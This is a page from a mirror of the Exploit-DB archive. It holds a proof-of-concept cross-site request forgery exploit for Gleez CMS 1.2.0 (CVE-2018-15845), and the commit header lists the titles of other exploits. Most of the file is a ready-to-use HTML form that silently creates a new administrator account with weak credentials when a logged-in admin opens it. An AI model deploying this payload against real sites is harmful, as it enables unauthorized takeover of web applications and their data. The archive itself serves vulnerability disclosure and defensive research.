bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/45258.txt
Offensive Security 18e2848633 DB: 2018-08-28 
25 changes to exploits/shellcodes

Firefox 55.0.3 - Denial of Service (PoC)
Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
Libpango 1.40.8 - Denial of Service (PoC)
Adobe Flash - AVC Processing Out-of-Bounds Read

Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
CuteFTP 5.0 - Buffer Overflow
Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)

OpenSSH 7.7 - Username Enumeration
OpenSSH 2.3 < 7.7 - Username Enumeration
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (1)
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (2)
Node.JS - 'node-serialize' Remote Code Execution
Electron WebPreferences - Remote Code Execution
HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)

Auditor Website 2.0.1 - Cross-Site Scripting
Basic B2B Script 2.0.0 - Cross-Site Scripting
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting

Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
LiteCart 2.1.2 - Arbitrary File Upload
Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection
Responsive FileManager < 9.13.4 - Directory Traversal
WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection
2018-08-28 05:01:59 +00:00

33 lines
No EOL
1.5 KiB
Text
Raw Blame History

# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845
# Description:
# There is a CSRF vulnerability that can add an administrator account in
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator logged in,open the POC,that will create an new admin account unexcused.
# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/admin/users/add?0=" method="POST">
<input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
<input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="pass" value="test" />
<input type="hidden" name="nick" value="test" />
<input type="hidden" name="mail" value="admin@admin.cc" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
<input type="hidden" name="site_url" value="http://server/" />
<input type="hidden" name="user" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink